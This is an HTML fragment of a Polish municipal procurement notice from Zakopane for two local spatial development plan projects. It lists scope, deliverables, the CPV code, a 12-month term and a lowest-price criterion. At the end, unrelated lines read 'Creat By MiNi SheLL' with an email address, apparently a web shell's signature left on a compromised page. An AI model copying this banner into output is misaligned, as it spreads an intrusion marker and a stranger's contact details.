<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Projekt miejscowego planu zagospodarowania przestrzennego Zakopianka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia Zadania I  jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego zwanego w treści umowy projektem planu oraz wykonania czynności związanych ze sporządzeniem tego planu według procedur i problematyki określonej w ustawie z dnia 27 marca 2003r.o  planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012r. poz. 647 t. j. ze zm.),a także innymi przepisami odrębnymi dla obszaru określonego w załączniku graficznym nr 1 do Uchwały Rady Miasta Zakopane Nr XXXII 401 2012 z dnia 27 września 2012 r. w sprawie przystąpienia do sporządzenia Miejscowego planu zagospodarowania przestrzennego Zakopianka w Zakopanem, o powierzchni opracowania ok. 34 ha. Projekt planu składać się będzie z części tekstowej i graficznej, prognozy oddziaływania na środowisko oraz opracowania ekofizjograficznego, prognozy skutków finansowych uchwalenia planu.

2.Zakres projektu planu według Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587).

3.W zakres umowy wchodzi wykonanie przez Wykonawcę wszystkich wskazanych w ust. 1 opracowań, uczestniczenie w czynnościach oraz przygotowanie pism szczegółowo określonych w harmonogramie prac i płatności stanowiącym załącznik nr 2 do umowy oraz wszelkie prace projektowe lub czynności nie opisane w umowie i specyfikacji, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisach prawa, w tym uchwalonych po dniu podpisania umowy, niezbędne do właściwego i kompletnego opracowania zamówienia.

4.Wykonawca wykona projekty planów i opracowań w tradycyjnej formie maszynopisu i planszowych rysunków oraz cyfrowej. Część cyfrowa, graficzna ma być sporządzona, jako zapis w formie umożliwiającej odczytanie i wydrukowanie każdego ze zbioru elementów określonej grupy tematycznej (niezależne pliki) oddzielnie lub kilku plików razem z zachowaniem założonej kolejności ich wyświetlania. Opracowanie cyfrowe, graficzne winno być dostarczone w programie, który umożliwia wymianę danych w standardach GIS. Projekt planu zgodnie  z  § 3. ust.1. Rozporządzenia z dnia 27 grudnia 2011 r. w sprawie wymagań technicznych dla dokumentów elektronicznych zawierających akty normatywne i inne akty prawne, dzienników urzędowych wydawanych w postaci elektronicznej oraz środków komunikacji elektronicznej i informatycznych nośników danych (Dz. U. z 2011 r. Nr 289, poz 1699) winien być sporządzony w formacie XML z uwzględnieniem specyfiki programu. W przypadku zmiany zapisów powyższego rozporządzenia w trakcie sporządzania projektu planu, Wykonawca uwzględni te zmiany w sporządzanym projekcie planu.

5.Potwierdzeniem wykonania zamówienia jest przekazanie planu końcowym protokołem zdawczo - odbiorczym, w następującej formie:
1)analogowej (papierowej) planu , w tym:
a.1 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu jako odpowiednio oprawionej mapy ściennej na twardym podkładzie sporządzony w skali 1 : 2000,
b.6 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu, w formie luźnej sporządzonych w skali 1 : 2000,
c.2 oprawione egz. wydruku uchwały w formacie XML w sprawie uchwalenia planu,
d.2 oprawione egz. prognozy oddziaływania na środowisko, z rysunkiem,
e.2 oprawione egz. opracowania ekofizjograficznego, z rysunkiem.
2)Cyfrowej, w tym:
a.1 egz. płyt CD zawierające materiały wymienione w ust 1,
1 Teczki w twardej okładce  zawierającej oprawione opracowania:
a. w formie analogowej 1 egz. tekstu w formacie XML i rysunku planu stanowiącego załącznik do uchwały w sprawie uchwalenia planu w kolorze, w formie luźnej  sporządzony w skali 1 : 2000,
b.w formie analogowej 1 oprawiony egz. prognozy oddziaływania na środowisko, z rysunkiem,
c.w formie analogowej 1 egz. opracowania ekofizjograficznego,z rysunkiem.
d.1 egz. płyt CD zawierającej w formie cyfrowej wymienione w niniejszym punkcie materiały.
4)1 egzemplarz dokumentacji formalno prawnej (oryginał )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> projekt zmiany miejscowego planu zagospodarowania przestrzennego Gubałówka I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia zadania II  jest wykonanie projektu zmiany Miejscowego planu zagospodarowania przestrzennego Gubałówka I  przyjętego Uchwałą Rady Miasta Zakopane Nr XXVII/345/2008 z dnia 31 lipca 2008r. (Dziennik Urzędowy Województwa Małopolskiego Nr 589, poz. 3873 z dnia 12 września 2008r.), zwanego w treści umowy projektem planu oraz wykonania czynności związanych ze sporządzeniem tego planu według procedur i problematyki określonej w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012r. poz. 647 t. j. ze zm.), a także innymi przepisami odrębnymi dla obszaru określonego w załączniku graficznym nr 1 do Uchwały Rady Miasta Zakopane Nr XXXVII 481 2013 z dnia 28 lutego 2013 r. w sprawie przystąpienia do sporządzenia zmiany Miejscowego planu zagospodarowania przestrzennego Gubałówka I , o powierzchni opracowania ok. 0,77 ha. Projekt planu składać się będzie z części tekstowej i graficznej, prognozy oddziaływania na środowisko oraz prognozy skutków finansowych uchwalenia planu.

2.Zakres projektu planu według Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587).

3.W zakres umowy wchodzi wykonanie przez Wykonawcę wszystkich wskazanych w ust. 1 opracowań, uczestniczenie w czynnościach oraz przygotowanie pism szczegółowo określonych w harmonogramie prac i płatności stanowiącym załącznik nr 2 do umowy oraz wszelkie prace projektowe lub czynności nie opisane w umowie i specyfikacji, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisach prawa, w tym uchwalonych po dniu podpisania umowy, niezbędne do właściwego i kompletnego opracowania zamówienia.

4.Wykonawca wykona projekty planów i opracowań w tradycyjnej formie maszynopisu  i planszowych rysunków oraz cyfrowej. Część cyfrowa, graficzna ma być sporządzona, jako zapis w formie umożliwiającej odczytanie i wydrukowanie każdego ze zbioru elementów określonej grupy tematycznej (niezależne pliki) oddzielnie lub kilku plików razem z zachowaniem założonej kolejności ich wyświetlania. Opracowanie cyfrowe, graficzne winno być dostarczone w programie, który umożliwia wymianę danych w standardach GIS. Projekt planu zgodnie   z  § 3.ust.1.Rozporządzenia z dnia 27 grudnia 2011 r. w sprawie wymagań technicznych dla dokumentów elektronicznych zawierających akty normatywne i inne akty prawne, dzienników urzędowych wydawanych w postaci elektronicznej oraz środków komunikacji elektronicznej i informatycznych nośników danych (Dz. U. z 2011 r. Nr 289, poz 1699) winien być sporządzony w formacie XML z uwzględnieniem specyfiki programu. W przypadku zmiany zapisów powyższego rozporządzenia w trakcie sporządzania projektu planu, Wykonawca uwzględni te zmiany w sporządzanym projekcie planu.

5.Potwierdzeniem wykonania zamówienia jest przekazanie planu końcowym protokołem zdawczo - odbiorczym, w następującej formie:
1)analogowej (papierowej) planu , w tym:
a.1 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu jako odpowiednio oprawionej mapy ściennej na twardym podkładzie, sporządzony w skali 1 : 2000,
b.6 egz.  rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu, w formie  luźnej  sporządzonych w skali 1 : 2000,
c.2 oprawione egz. wydruku uchwały w formacie XML w sprawie uchwalenia planu,
d.2 oprawione egz. prognozy oddziaływania na środowisko, z rysunkiem,
2)Cyfrowej, w tym:
a.1 egz. płyt CD zawierające materiały wymienione w ust 1,
 1 Teczki w twardej okładce  zawierającej oprawione opracowania:
a. w formie analogowej 1 egz. tekstu w formacie XML i rysunku planu stanowiącego załącznik do uchwały w sprawie uchwalenia planu w kolorze, w formie luźnej sporządzony w skali 1 : 2000,
b.w formie analogowej 1 oprawiony egz. prognozy oddziaływania na środowisko, z rysunkiem,
c.1 egz. płyt CD zawierającej w formie cyfrowej wymienione w niniejszym punkcie materiały.
4)1 egzemplarz dokumentacji formalno prawnej (oryginał )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com